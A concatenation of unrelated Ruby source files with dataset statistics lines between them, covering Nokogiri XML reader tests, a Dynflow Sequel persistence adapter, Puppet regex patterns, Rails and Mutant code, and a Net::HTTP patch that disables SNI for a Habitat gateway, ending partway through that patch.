<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
assert_equal 0, reader.attribute_count
assert_equal [1, 0, 1, 0, 0, 0, 0], reader.map(&:attribute_count)
end
def test_depth
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo>snuggles!</tenderlove:foo>
</x>
eoxml
assert_equal 0, reader.depth
assert_equal [0, 1, 1, 2, 1, 1, 0], reader.map(&:depth)
end
def test_encoding
string = <<-eoxml
<awesome>
<p xml:lang="en">The quick brown fox jumps over the lazy dog.</p>
<p xml:lang="ja">日本語が上手です</p>
</awesome>
eoxml
reader = Nokogiri::XML::Reader.from_memory(string, nil, 'UTF-8')
assert_equal ['UTF-8'], reader.map(&:encoding).uniq
end
def test_xml_version
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo>snuggles!</tenderlove:foo>
</x>
eoxml
assert_nil reader.xml_version
assert_equal ['1.0'], reader.map(&:xml_version).uniq
end
def test_lang
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<awesome>
<p xml:lang="en">The quick brown fox jumps over the lazy dog.</p>
<p xml:lang="ja">日本語が上手です</p>
</awesome>
eoxml
assert_nil reader.lang
assert_equal [nil, nil, "en", "en", "en", nil, "ja", "ja", "ja", nil, nil],
reader.map(&:lang)
end
def test_value
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo>snuggles!</tenderlove:foo>
</x>
eoxml
assert_nil reader.value
assert_equal [nil, "\n ", nil, "snuggles!", nil, "\n ", nil],
reader.map(&:value)
end
def test_prefix
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:edi='http://ecommerce.example.org/schema'>
<edi:foo>hello</edi:foo>
</x>
eoxml
assert_nil reader.prefix
assert_equal [nil, nil, "edi", nil, "edi", nil, nil],
reader.map(&:prefix)
end
def test_node_type
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x>
<y>hello</y>
</x>
eoxml
assert_equal 0, reader.node_type
assert_equal [1, 14, 1, 3, 15, 14, 15], reader.map(&:node_type)
end
def test_inner_xml
str = "<x><y>hello</y></x>"
reader = Nokogiri::XML::Reader.from_memory(str)
reader.read
assert_equal "<y>hello</y>", reader.inner_xml
end
def test_outer_xml
str = ["<x><y>hello</y></x>", "<y>hello</y>", "hello", "<y/>", "<x/>"]
reader = Nokogiri::XML::Reader.from_memory(str.first)
xml = []
reader.map { |node| xml << node.outer_xml }
assert_equal str, xml
end
def test_outer_xml_with_empty_nodes
str = ["<x><y/></x>", "<y/>", "<x/>"]
reader = Nokogiri::XML::Reader.from_memory(str.first)
xml = []
reader.map { |node| xml << node.outer_xml }
assert_equal str, xml
end
def test_state
reader = Nokogiri::XML::Reader.from_memory('<foo>bar</bar>')
assert reader.state
end
def test_ns_uri
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:edi='http://ecommerce.example.org/schema'>
<edi:foo>hello</edi:foo>
</x>
eoxml
assert_nil reader.namespace_uri
assert_equal([nil,
nil,
"http://ecommerce.example.org/schema",
nil,
"http://ecommerce.example.org/schema",
nil,
nil],
reader.map(&:namespace_uri))
end
def test_namespaced_attributes
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:edi='http://ecommerce.example.org/schema' xmlns:commons="http://rets.org/xsd/RETSCommons">
<edi:foo commons:street-number="43">hello</edi:foo>
<y edi:name="francis" bacon="87"/>
</x>
eoxml
attr_ns = []
while reader.read
if reader.node_type == Nokogiri::XML::Node::ELEMENT_NODE
reader.attribute_nodes.each {|attr| attr_ns << (attr.namespace.nil? ? nil : attr.namespace.prefix) }
end
end
assert_equal(['commons',
'edi',
nil],
attr_ns)
end
def test_local_name
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:edi='http://ecommerce.example.org/schema'>
<edi:foo>hello</edi:foo>
</x>
eoxml
assert_nil reader.local_name
assert_equal(["x", "#text", "foo", "#text", "foo", "#text", "x"],
reader.map(&:local_name))
end
def test_name
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:edi='http://ecommerce.example.org/schema'>
<edi:foo>hello</edi:foo>
</x>
eoxml
assert_nil reader.name
assert_equal(["x", "#text", "edi:foo", "#text", "edi:foo", "#text", "x"],
reader.map(&:name))
end
def test_base_uri
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xml:base="http://base.example.org/base/">
<link href="link"/>
<other xml:base="http://other.example.org/"/>
<relative xml:base="relative">
<link href="stuff" />
</relative>
</x>
eoxml
assert_nil reader.base_uri
assert_equal(["http://base.example.org/base/",
"http://base.example.org/base/",
"http://base.example.org/base/",
"http://base.example.org/base/",
"http://other.example.org/",
"http://base.example.org/base/",
"http://base.example.org/base/relative",
"http://base.example.org/base/relative",
"http://base.example.org/base/relative",
"http://base.example.org/base/relative",
"http://base.example.org/base/relative",
"http://base.example.org/base/",
"http://base.example.org/base/"],
reader.map(&:base_uri))
end
def test_xlink_href_without_base_uri
reader = Nokogiri::XML::Reader(<<-eoxml)
<x xmlns:xlink="http://www.w3.org/1999/xlink">
<link xlink:href="#other">Link</link>
<other id="other">Linked Element</other>
</x>
eoxml
reader.each do |node|
if node.node_type == Nokogiri::XML::Reader::TYPE_ELEMENT
if node.name == 'link'
assert_nil node.base_uri
end
end
end
end
def test_xlink_href_with_base_uri
reader = Nokogiri::XML::Reader(<<-eoxml)
<x xml:base="http://base.example.org/base/"
xmlns:xlink="http://www.w3.org/1999/xlink">
<link xlink:href="#other">Link</link>
<other id="other">Linked Element</other>
</x>
eoxml
reader.each do |node|
if node.node_type == Nokogiri::XML::Reader::TYPE_ELEMENT
assert_equal node.base_uri, "http://base.example.org/base/"
end
end
end
def test_read_from_memory
called = false
reader = Nokogiri::XML::Reader.from_memory('<foo>bar</foo>')
reader.each do |node|
called = true
assert node
end
assert called
end
def test_large_document_smoke_test
# simply run on a large document to verify that there no GC issues
xml = []
xml << "<elements>"
10000.times { |j| xml << "<element id=\"#{j}\"/>" }
xml << "</elements>"
xml = xml.join("\n")
Nokogiri::XML::Reader.from_memory(xml).each do |e|
e.attributes
end
end
def test_correct_outer_xml_inclusion
xml = Nokogiri::XML::Reader.from_io(StringIO.new(<<-eoxml))
<root-element>
<children>
<child n="1">
<field>child-1</field>
</child>
<child n="2">
<field>child-2</field>
</child>
<child n="3">
<field>child-3</field>
</child>
</children>
</root-element>
eoxml
nodelengths = []
has_child2 = []
xml.each do |node|
if node.node_type == Nokogiri::XML::Reader::TYPE_ELEMENT and node.name == "child"
nodelengths << node.outer_xml.length
has_child2 << !!(node.outer_xml =~ /child-2/)
end
end
assert_equal(nodelengths[0], nodelengths[1])
assert(has_child2[1])
assert(!has_child2[0])
end
def test_correct_inner_xml_inclusion
xml = Nokogiri::XML::Reader.from_io(StringIO.new(<<-eoxml))
<root-element>
<children>
<child n="1">
<field>child-1</field>
</child>
<child n="2">
<field>child-2</field>
</child>
<child n="3">
<field>child-3</field>
</child>
</children>
</root-element>
eoxml
nodelengths = []
has_child2 = []
xml.each do |node|
if node.node_type == Nokogiri::XML::Reader::TYPE_ELEMENT and node.name == "child"
nodelengths << node.inner_xml.length
has_child2 << !!(node.inner_xml =~ /child-2/)
end
end
assert_equal(nodelengths[0], nodelengths[1])
assert(has_child2[1])
assert(!has_child2[0])
end
def test_nonexistent_attribute
require 'nokogiri'
reader = Nokogiri::XML::Reader("<root xmlns='bob'><el attr='fred' /></root>")
reader.read # root
reader.read # el
assert_equal nil, reader.attribute('other')
end
end
end
end
| 33.108374 | 118 | 0.528195 |
e29d4e2c993a6236defb63dc2f96f609a633720f | 151 | class Card < ActiveRecord::Base
has_many :guesses
belongs_to :deck
validates :question, presence: true
validates :answer, presence: true
end
| 16.777778 | 37 | 0.748344 |
18c60555071a82bd59d2468e47ae2b0523eb83d2 | 16,629 | # frozen_string_literal: true
require 'sequel'
require 'multi_json'
require 'fileutils'
require 'csv'
module Dynflow
module PersistenceAdapters
Sequel.extension :migration
Sequel.database_timezone = :utc
class Sequel < Abstract
include Algebrick::TypeCheck
include Algebrick::Matching
MAX_RETRIES = 10
RETRY_DELAY = 1
attr_reader :db
def pagination?
true
end
def filtering_by
META_DATA.fetch :execution_plan
end
def ordering_by
META_DATA.fetch :execution_plan
end
META_DATA = { execution_plan: %w(label state result started_at ended_at real_time execution_time root_plan_step_id class),
action: %w(caller_execution_plan_id caller_action_id class plan_step_id run_step_id finalize_step_id),
step: %w(state started_at ended_at real_time execution_time action_id progress_done progress_weight
class action_class execution_plan_uuid queue),
envelope: %w(receiver_id),
coordinator_record: %w(id owner_id class),
delayed: %w(execution_plan_uuid start_at start_before args_serializer frozen)}
SERIALIZABLE_COLUMNS = { action: %w(input output),
delayed: %w(serialized_args),
execution_plan: %w(run_flow finalize_flow execution_history step_ids),
step: %w(error children) }
def initialize(config)
migrate = true
config = config.dup
@additional_responsibilities = { coordinator: true, connector: true }
if config.is_a?(Hash)
@additional_responsibilities.merge!(config.delete(:additional_responsibilities)) if config.key?(:additional_responsibilities)
migrate = config.fetch(:migrate, true)
end
@db = initialize_db config
migrate_db if migrate
end
def transaction(&block)
db.transaction(&block)
end
def find_execution_plans(options = {})
table_name = :execution_plan
options[:order_by] ||= :started_at
data_set = filter(table_name,
order(table_name,
paginate(table(table_name), options),
options),
options[:filters])
data_set.all.map { |record| execution_plan_column_map(load_data(record, table_name)) }
end
def find_execution_plan_counts(options = {})
filter(:execution_plan, table(:execution_plan), options[:filters]).count
end
def delete_execution_plans(filters, batch_size = 1000, backup_dir = nil)
count = 0
filter(:execution_plan, table(:execution_plan), filters).each_slice(batch_size) do |plans|
uuids = plans.map { |p| p.fetch(:uuid) }
@db.transaction do
table(:delayed).where(execution_plan_uuid: uuids).delete
steps = table(:step).where(execution_plan_uuid: uuids)
backup_to_csv(steps, backup_dir, 'steps.csv') if backup_dir
steps.delete
actions = table(:action).where(execution_plan_uuid: uuids)
backup_to_csv(actions, backup_dir, 'actions.csv') if backup_dir
actions.delete
execution_plans = table(:execution_plan).where(uuid: uuids)
backup_to_csv(execution_plans, backup_dir, 'execution_plans.csv') if backup_dir
count += execution_plans.delete
end
end
return count
end
def load_execution_plan(execution_plan_id)
execution_plan_column_map(load :execution_plan, uuid: execution_plan_id)
end
def save_execution_plan(execution_plan_id, value)
save :execution_plan, { uuid: execution_plan_id }, value, with_data: false
end
def delete_delayed_plans(filters, batch_size = 1000)
count = 0
filter(:delayed, table(:delayed), filters).each_slice(batch_size) do |plans|
uuids = plans.map { |p| p.fetch(:execution_plan_uuid) }
@db.transaction do
count += table(:delayed).where(execution_plan_uuid: uuids).delete
end
end
count
end
def find_old_execution_plans(age)
table_name = :execution_plan
table(table_name)
.where(::Sequel.lit('ended_at <= ? AND state = ?', age, 'stopped'))
.all.map { |plan| execution_plan_column_map(load_data plan, table_name) }
end
def find_past_delayed_plans(time)
table_name = :delayed
table(table_name)
.where(::Sequel.lit('start_at <= ? OR (start_before IS NOT NULL AND start_before <= ?)', time, time))
.where(:frozen => false)
.order_by(:start_at)
.all
.map { |plan| load_data(plan, table_name) }
end
def load_delayed_plan(execution_plan_id)
load :delayed, execution_plan_uuid: execution_plan_id
rescue KeyError
return nil
end
def save_delayed_plan(execution_plan_id, value)
save :delayed, { execution_plan_uuid: execution_plan_id }, value, with_data: false
end
def load_step(execution_plan_id, step_id)
load :step, execution_plan_uuid: execution_plan_id, id: step_id
end
def load_steps(execution_plan_id)
load_records :step, execution_plan_uuid: execution_plan_id
end
def save_step(execution_plan_id, step_id, value, update_conditions = {})
save :step, { execution_plan_uuid: execution_plan_id, id: step_id }, value,
with_data: false, update_conditions: update_conditions
end
def load_action(execution_plan_id, action_id)
load :action, execution_plan_uuid: execution_plan_id, id: action_id
end
def load_actions(execution_plan_id, action_ids)
load_records :action, { execution_plan_uuid: execution_plan_id, id: action_ids }
end
def load_actions_attributes(execution_plan_id, attributes)
load_records :action, { execution_plan_uuid: execution_plan_id }, attributes
end
def save_action(execution_plan_id, action_id, value)
save :action, { execution_plan_uuid: execution_plan_id, id: action_id }, value, with_data: false
end
def connector_feature!
unless @additional_responsibilities[:connector]
raise "The sequel persistence adapter connector feature used but not enabled in additional_features"
end
end
def save_envelope(data)
connector_feature!
save :envelope, {}, data
end
def pull_envelopes(receiver_id)
connector_feature!
db.transaction do
data_set = table(:envelope).where(receiver_id: receiver_id).all
envelopes = data_set.map { |record| load_data(record) }
table(:envelope).where(id: data_set.map { |d| d[:id] }).delete
return envelopes
end
end
def push_envelope(envelope)
connector_feature!
table(:envelope).insert(prepare_record(:envelope, envelope))
end
def prune_envelopes(receiver_ids)
connector_feature!
table(:envelope).where(receiver_id: receiver_ids).delete
end
def prune_undeliverable_envelopes
connector_feature!
table(:envelope).where(receiver_id: table(:coordinator_record).select(:id)).invert.delete
end
def coordinator_feature!
unless @additional_responsibilities[:coordinator]
raise "The sequel persistence adapter coordinator feature used but not enabled in additional_features"
end
end
def insert_coordinator_record(value)
coordinator_feature!
save :coordinator_record, {}, value
end
def update_coordinator_record(class_name, record_id, value)
coordinator_feature!
save :coordinator_record, {class: class_name, :id => record_id}, value
end
def delete_coordinator_record(class_name, record_id)
coordinator_feature!
table(:coordinator_record).where(class: class_name, id: record_id).delete
end
def find_coordinator_records(options)
coordinator_feature!
options = options.dup
filters = (options[:filters] || {}).dup
exclude_owner_id = filters.delete(:exclude_owner_id)
data_set = filter(:coordinator_record, table(:coordinator_record), filters)
if exclude_owner_id
data_set = data_set.exclude(:owner_id => exclude_owner_id)
end
data_set.all.map { |record| load_data(record) }
end
def to_hash
{ execution_plans: table(:execution_plan).all.to_a,
steps: table(:step).all.to_a,
actions: table(:action).all.to_a,
envelopes: table(:envelope).all.to_a }
end
def migrate_db
::Sequel::Migrator.run(db, self.class.migrations_path, table: 'dynflow_schema_info')
end
def abort_if_pending_migrations!
::Sequel::Migrator.check_current(db, self.class.migrations_path, table: 'dynflow_schema_info')
end
private
TABLES = { execution_plan: :dynflow_execution_plans,
action: :dynflow_actions,
step: :dynflow_steps,
envelope: :dynflow_envelopes,
coordinator_record: :dynflow_coordinator_records,
delayed: :dynflow_delayed_plans }
def table(which)
db[TABLES.fetch(which)]
end
def initialize_db(db_path)
::Sequel.connect db_path
end
def self.migrations_path
File.expand_path('../sequel_migrations', __FILE__)
end
def prepare_record(table_name, value, base = {}, with_data = true)
record = base.dup
if with_data && table(table_name).columns.include?(:data)
record[:data] = dump_data(value)
else
record[:data] = nil
record.merge! serialize_columns(table_name, value)
end
record.merge! extract_metadata(table_name, value)
record.each { |k, v| record[k] = v.to_s if v.is_a? Symbol }
record
end
def serialize_columns(table_name, record)
record.reduce({}) do |acc, (key, value)|
if SERIALIZABLE_COLUMNS.fetch(table_name, []).include?(key.to_s)
acc.merge(key.to_sym => dump_data(value))
else
acc
end
end
end
def save(what, condition, value, with_data: true, update_conditions: {})
table = table(what)
existing_record = with_retry { table.first condition } unless condition.empty?
if value
record = prepare_record(what, value, (existing_record || condition), with_data)
if existing_record
condition = update_conditions.merge(condition)
return with_retry { table.where(condition).update(record) }
else
with_retry { table.insert record }
end
else
existing_record and with_retry { table.where(condition).delete }
end
value
end
def load_record(what, condition)
table = table(what)
if (record = with_retry { table.first(Utils.symbolize_keys(condition)) } )
load_data(record, what)
else
raise KeyError, "searching: #{what} by: #{condition.inspect}"
end
end
alias_method :load, :load_record
def load_records(what, condition, keys = nil)
table = table(what)
records = with_retry do
filtered = table.filter(Utils.symbolize_keys(condition))
# Filter out requested columns which the table doesn't have, load data just in case
filtered = filtered.select(:data, *(table.columns & keys)) unless keys.nil?
filtered.all
end
records = records.map { |record| load_data(record, what) }
return records if keys.nil?
records.map do |record|
keys.reduce({}) do |acc, key|
acc.merge(key => record[key])
end
end
end
def load_data(record, what = nil)
hash = if record[:data].nil?
SERIALIZABLE_COLUMNS.fetch(what, []).each do |key|
key = key.to_sym
record[key] = MultiJson.load(record[key]) unless record[key].nil?
end
record
else
MultiJson.load(record[:data])
end
Utils.indifferent_hash(hash)
end
def ensure_backup_dir(backup_dir)
FileUtils.mkdir_p(backup_dir) unless File.directory?(backup_dir)
end
def backup_to_csv(dataset, backup_dir, file_name)
ensure_backup_dir(backup_dir)
csv_file = File.join(backup_dir, file_name)
appending = File.exist?(csv_file)
columns = dataset.columns
File.open(csv_file, 'a') do |csv|
csv << columns.to_csv unless appending
dataset.each do |row|
csv << columns.collect { |col| row[col] }.to_csv
end
end
dataset
end
def delete(what, condition)
table(what).where(Utils.symbolize_keys(condition)).delete
end
def extract_metadata(what, value)
meta_keys = META_DATA.fetch(what) - SERIALIZABLE_COLUMNS.fetch(what, [])
value = Utils.indifferent_hash(value)
meta_keys.inject({}) { |h, k| h.update k.to_sym => value[k] }
end
def dump_data(value)
return if value.nil?
MultiJson.dump Type!(value, Hash, Array, Integer)
end
def paginate(data_set, options)
page = Integer(options[:page]) if options[:page]
per_page = Integer(options[:per_page]) if options[:per_page]
if page
raise ArgumentError, "page specified without per_page attribute" unless per_page
data_set.limit per_page, per_page * page
else
data_set
end
end
def order(what, data_set, options)
order_by = (options[:order_by]).to_s
return data_set if order_by.empty?
unless META_DATA.fetch(what).include? order_by
raise ArgumentError, "unknown column #{order_by.inspect}"
end
order_by = order_by.to_sym
data_set.order_by options[:desc] ? ::Sequel.desc(order_by) : order_by
end
def filter(what, data_set, filters)
Type! filters, NilClass, Hash
return data_set if filters.nil?
filters = filters.each.with_object({}) { |(k, v), hash| hash[k.to_s] = v }
unknown = filters.keys - META_DATA.fetch(what)
if what == :execution_plan
unknown -= %w[uuid caller_execution_plan_id caller_action_id delayed]
if filters.key?('caller_action_id') && !filters.key?('caller_execution_plan_id')
raise ArgumentError, "caller_action_id given but caller_execution_plan_id missing"
end
if filters.key?('caller_execution_plan_id')
data_set = data_set.join_table(:inner, TABLES[:action], :execution_plan_uuid => :uuid).
select_all(TABLES[:execution_plan]).distinct
end
if filters.key?('delayed')
filters.delete('delayed')
data_set = data_set.join_table(:inner, TABLES[:delayed], :execution_plan_uuid => :uuid).
select_all(TABLES[:execution_plan]).distinct
end
end
unless unknown.empty?
raise ArgumentError, "unkown columns: #{unknown.inspect}"
end
data_set.where Utils.symbolize_keys(filters)
end
def with_retry
attempts = 0
begin
yield
rescue ::Sequel::DatabaseConnectionError, ::Sequel::DatabaseDisconnectError => e
attempts += 1
log(:error, e)
if attempts > MAX_RETRIES
log(:error, "The number of MAX_RETRIES exceeded")
raise Errors::FatalPersistenceError.delegate(e)
else
log(:error, "Persistence retry no. #{attempts}")
sleep RETRY_DELAY
retry
end
rescue Exception => e
raise Errors::PersistenceError.delegate(e)
end
end
def execution_plan_column_map(plan)
plan[:id] = plan[:uuid] unless plan[:uuid].nil?
plan
end
end
end
end
| 34.64375 | 135 | 0.615732 |
ff174c6c6bb72c420ba9b218506719bcfa2f3ef0 | 2,097 | # The Patterns module contains common regular expression patters for the Puppet DSL language
module Puppet::Pops::Patterns

  # NUMERIC matches hex, octal, decimal, and floating point and captures several parts
  # 0 = entire matched number, leading and trailing whitespace and sign included
  # 1 = sign, +, - or nothing
  # 2 = entire numeric part
  # 3 = hexadecimal number
  # 4 = non hex integer portion, possibly with leading 0 (octal)
  # 5 = floating point part, starts with ".", decimals and optional exponent
  #
  # Thus, a hex number has group 3 value, an octal value has group 4 (if it starts with 0), and no group 3
  # and a floating point value has group 4 and group 5.
  #
  NUMERIC = %r{\A[[:blank:]]*([-+]?)[[:blank:]]*((0[xX][0-9A-Fa-f]+)|(0?\d+)((?:\.\d+)?(?:[eE]-?\d+)?))[[:blank:]]*\z}

  # ILLEGAL_HOSTNAME_CHARS matches if a hostname contains illegal characters
  # (anything other than word characters, '-' and '.').
  # This check does not prevent pathological names like 'a....b', '.....', "---". etc.
  ILLEGAL_HOSTNAME_CHARS = %r{[^-\w.]}

  # NAME matches a name the same way as the lexer: '::'-separated segments,
  # each starting with a lower-case letter, optionally absolute (leading '::').
  NAME = %r{\A((::)?[a-z]\w*)(::[a-z]\w*)*\z}

  # CLASSREF_EXT matches a class reference the same way as the lexer - i.e. the external source form
  # where each part must start with a capital letter A-Z.
  # This name includes hyphen, which may be illegal in some cases.
  # NOTE(review): \w does not actually match '-', so the hyphen remark above
  # appears stale — confirm against the lexer.
  #
  CLASSREF_EXT = %r{\A((::){0,1}[A-Z][\w]*)+\z}

  # CLASSREF matches a class reference the way it is represented internally in the
  # model (i.e. in lower case).
  # This name includes hyphen, which may be illegal in some cases.
  # NOTE(review): as with CLASSREF_EXT, \w does not match '-'.
  #
  CLASSREF = %r{\A((::){0,1}[a-z][\w]*)+\z}

  # DOLLAR_VAR matches a variable name including the initial $ character
  DOLLAR_VAR = %r{\$(::)?(\w+::)*\w+}

  # VAR_NAME matches the name part of a variable (The $ character is not included)
  # Note, that only the final segment may start with an underscore.
  VAR_NAME = %r{\A(:?(::)?[a-z]\w*)*(:?(::)?[a-z_]\w*)\z}

  # A Numeric var name must be the decimal number 0, or a decimal number not starting with 0
  NUMERIC_VAR_NAME = %r{\A(?:0|(?:[1-9][0-9]*))\z}
end
| 44.617021 | 118 | 0.649976 |
1137c8036b2a8379665e04546f3d064ba39f77ef | 1,663 | class ApplicationController < ActionController::Base
http_basic_authenticate_with name: ENV['BASIC_AUTH_NAME'],
password: ENV['BASIC_AUTH_PASSWORD'] if Rails.env.staging?
before_action :store_location , unless: :login_page_access?
# Prevent CSRF attacks by raising an exception.
# For APIs, you may want to use :null_session instead.
protect_from_forgery with: :exception
include SessionsHelper
before_action :set_request_variant
# NOTE: rescue_from methods are evaluated from **bottom to up**
if Rails.env.production?
rescue_from Exception, with: :render_500
rescue_from ActiveRecord::RecordNotFound, with: :render_404
rescue_from ActionController::RoutingError, with: :render_404
rescue_from Scrivito::ResourceNotFound, with: :render_404
end
private
def store_location
session[:original_url] = request.original_url
end
def login_page_access?
%w(login_page sessions).include? self.controller_name
end
def set_request_variant
request.variant = request.device_variant
end
def render_403(e)
render template: 'errors/403', status: 403,
layout: 'application',
content_type: 'text/html'
end
def render_404(e)
render template: 'errors/404', status: 404,
layout: 'application',
content_type: 'text/html'
end
def render_500(e)
render template: 'errors/500', status: 500,
layout: 'application',
content_type: 'text/html'
end
end
| 30.796296 | 85 | 0.643416 |
184ed5129097074ced63093d4725b8d274ebe9f7 | 2,282 | # frozen_string_literal: true
module Mutant
class Reporter
class CLI
class Printer
# Env progress printer
class EnvProgress < self
delegate(
:coverage,
:amount_subjects,
:amount_mutations,
:amount_mutations_alive,
:amount_mutations_killed,
:amount_mutation_results,
:runtime,
:killtime,
:overhead,
:env
)
FORMATS = IceNine.deep_freeze([
[:info, 'Subjects: %s', :amount_subjects ],
[:info, 'Mutations: %s', :amount_mutations ],
[:info, 'Results: %s', :amount_mutation_results ],
[:info, 'Kills: %s', :amount_mutations_killed ],
[:info, 'Alive: %s', :amount_mutations_alive ],
[:info, 'Runtime: %0.2fs', :runtime ],
[:info, 'Killtime: %0.2fs', :killtime ],
[:info, 'Overhead: %0.2f%%', :overhead_percent ],
[:info, 'Mutations/s: %0.2f', :mutations_per_second ],
[:status, 'Coverage: %0.2f%%', :coverage_percent ]
])
# Run printer
#
# @return [undefined]
def run
visit(Config, env.config)
FORMATS.each do |report, format, value|
__send__(report, format, __send__(value))
end
end
private
# Mutations processed per second
#
# @return [Float]
#
# @api private
def mutations_per_second
amount_mutation_results / runtime
end
# Coverage in percent
#
# @return [Float]
#
# @api private
def coverage_percent
coverage * 100
end
# Overhead in percent
#
# @return [Float]
#
# @api private
def overhead_percent
(overhead / killtime) * 100
end
end # EnvProgress
end # Printer
end # CLI
end # Reporter
end # Mutant
| 29.25641 | 78 | 0.442594 |
7a30bae2225eb5ba41030dec8fb83b6b1a5c4543 | 899 | # frozen_string_literal: true
require "rails"
require "react_on_rails/error"
require "react_on_rails/prerender_error"
require "react_on_rails/json_parse_error"
require "react_on_rails/helper"
require "react_on_rails/controller"
require "react_on_rails/version"
require "react_on_rails/version_checker"
require "react_on_rails/configuration"
require "react_on_rails/server_rendering_pool"
require "react_on_rails/engine"
require "react_on_rails/react_component/render_options"
require "react_on_rails/version_syntax_converter"
require "react_on_rails/test_helper"
require "react_on_rails/git_utils"
require "react_on_rails/utils"
require "react_on_rails/webpacker_utils"
require "react_on_rails/test_helper/webpack_assets_compiler"
require "react_on_rails/test_helper/webpack_assets_status_checker"
require "react_on_rails/test_helper/ensure_assets_compiled"
require "react_on_rails/locales_to_js"
| 35.96 | 66 | 0.87208 |
4a5d9acf6760655ddb41d113f6c5852f28229626 | 2,848 | require "spec_helper"
# unset models used for testing purposes
Object.unset_class('User')
class Notify::Senders::Mail < Notify::Base
def deliver
$notifications << 'mail'
$options = @options
end
end
class Notify::Senders::Jabber < Notify::Base
def deliver
$notifications << 'jabber'
$options = @options
end
end
class Notify::Senders::Inbox < Notify::Base
def deliver
$notifications << 'inbox'
$options = @options
end
end
class User < ActiveRecord::Base
has_many :notifications, :dependent => :destroy
end
describe "has_notifications" do
before(:each) do
$notifications = []
$options = nil
@user = User.create(:login => 'johndoe')
end
it "should create notification" do
doing {
create_notification
}.should_not raise_error
end
it "should serialize senders" do
notification = create_notification
notification.senders.should == %w(inbox mail jabber)
end
it "should send to mail only" do
notification = create_notification(:senders => %w(mail))
Notify.deliver(:name => 'friendship_invitation', :user => @user)
$notifications.should == %w(mail)
end
it "should send to mail and jabber" do
notification = create_notification(:senders => %w(mail jabber))
Notify.deliver(:name => 'friendship_invitation', :user => @user)
$notifications.should == %w(mail jabber)
end
it "should not send at all" do
Notify.deliver(:name => 'friendship_invitation', :user => @user)
$notifications.should be_empty
end
it "should set options" do
create_notification(:senders => %w(jabber))
Notify.deliver(:name => 'friendship_invitation', :user => @user, :some_data => 'some_data')
$options.should == {:user => @user, :name => 'friendship_invitation', :some_data => 'some_data'}
end
it "should raise if user is not set" do
doing {
Notify.deliver(:name => 'friendship_invitation')
}.should raise_error(ArgumentError)
end
it "should raise if name is not set" do
doing {
Notify.deliver(:user => @user)
}.should raise_error(ArgumentError)
end
it "should not invoke invalid name" do
Notify.deliver(:name => 'invalid', :user => @user)
end
it "should not invoke invalid senders" do
create_notification(:senders => %w(invalid))
Notify.deliver(:name => 'friendship_invitation', :user => @user)
$notifications.should == []
end
it "should invoke only valid senders" do
create_notification(:senders => %w(invalid mail))
Notify.deliver(:name => 'friendship_invitation', :user => @user)
$notifications.should == %w(mail)
end
private
def create_notification(options={})
@user.notifications.create!({
:name => 'friendship_invitation',
:senders => %w(inbox mail jabber)
}.merge(options))
end
end | 26.616822 | 100 | 0.662921 |
793e345f9d641cfe27d12306a5e354b7bd306dfd | 3,433 | # We have to monkey patch the Net::HTTP:connect method in order to disable SNI because it does not
# work with the Habitat Supervisor HTTP Gateway.
#
# This is accomplished by commenting out this line:
# s.hostname = @address if s.respond_to? :hostname=
# https://bugs.ruby-lang.org/attachments/4940
#
module Net
  class HTTP
    # Keep the stock implementation reachable for debugging/rollback.
    alias_method :old_connect, :connect

    # Copy of Net::HTTP#connect with exactly one functional change: the
    # line that sets the SNI hostname on the SSL socket is commented out
    # (see "HERE WE ARE DISABLING SNI!" below). Everything else must stay
    # byte-for-byte in step with the stdlib version this was copied from.
    def connect
      # Resolve the endpoint we actually dial: the proxy when configured,
      # otherwise the target host itself.
      if proxy? then
        conn_address = proxy_address
        conn_port    = proxy_port
      else
        conn_address = address
        conn_port    = port
      end

      D "opening connection to #{conn_address}:#{conn_port}..."
      # Bound the TCP handshake by @open_timeout; enrich connect errors
      # with the address we were dialing.
      s = Timeout.timeout(@open_timeout, Net::OpenTimeout) {
        begin
          TCPSocket.open(conn_address, conn_port, @local_host, @local_port)
        rescue => e
          raise e, "Failed to open TCP connection to " +
            "#{conn_address}:#{conn_port} (#{e.message})"
        end
      }
      s.setsockopt(Socket::IPPROTO_TCP, Socket::TCP_NODELAY, 1)
      D "opened"
      if use_ssl?
        if proxy?
          # Tunnel through the proxy with an HTTP CONNECT before starting TLS.
          plain_sock = BufferedIO.new(s, read_timeout: @read_timeout,
                                      continue_timeout: @continue_timeout,
                                      debug_output: @debug_output)
          buf = "CONNECT #{@address}:#{@port} HTTP/#{HTTPVersion}\r\n"
          buf << "Host: #{@address}:#{@port}\r\n"
          if proxy_user
            credential = ["#{proxy_user}:#{proxy_pass}"].pack('m0')
            buf << "Proxy-Authorization: Basic #{credential}\r\n"
          end
          buf << "\r\n"
          plain_sock.write(buf)
          HTTPResponse.read_new(plain_sock).value
          # assuming nothing left in buffers after successful CONNECT response
        end

        # Collect the ssl_* instance variables into SSLContext params.
        ssl_parameters = Hash.new
        iv_list = instance_variables
        SSL_IVNAMES.each_with_index do |ivname, i|
          if iv_list.include?(ivname) and
            value = instance_variable_get(ivname)
            ssl_parameters[SSL_ATTRIBUTES[i]] = value if value
          end
        end
        @ssl_context = OpenSSL::SSL::SSLContext.new
        @ssl_context.set_params(ssl_parameters)
        @ssl_context.session_cache_mode =
          OpenSSL::SSL::SSLContext::SESSION_CACHE_CLIENT |
          OpenSSL::SSL::SSLContext::SESSION_CACHE_NO_INTERNAL_STORE
        @ssl_context.session_new_cb = proc {|sock, sess| @ssl_session = sess }
        D "starting SSL for #{conn_address}:#{conn_port}..."
        s = OpenSSL::SSL::SSLSocket.new(s, @ssl_context)
        s.sync_close = true
        # Server Name Indication (SNI) RFC 3546
        # HERE WE ARE DISABLING SNI!
        # s.hostname = @address if s.respond_to? :hostname=
        # Reuse a cached TLS session while it is still within its timeout.
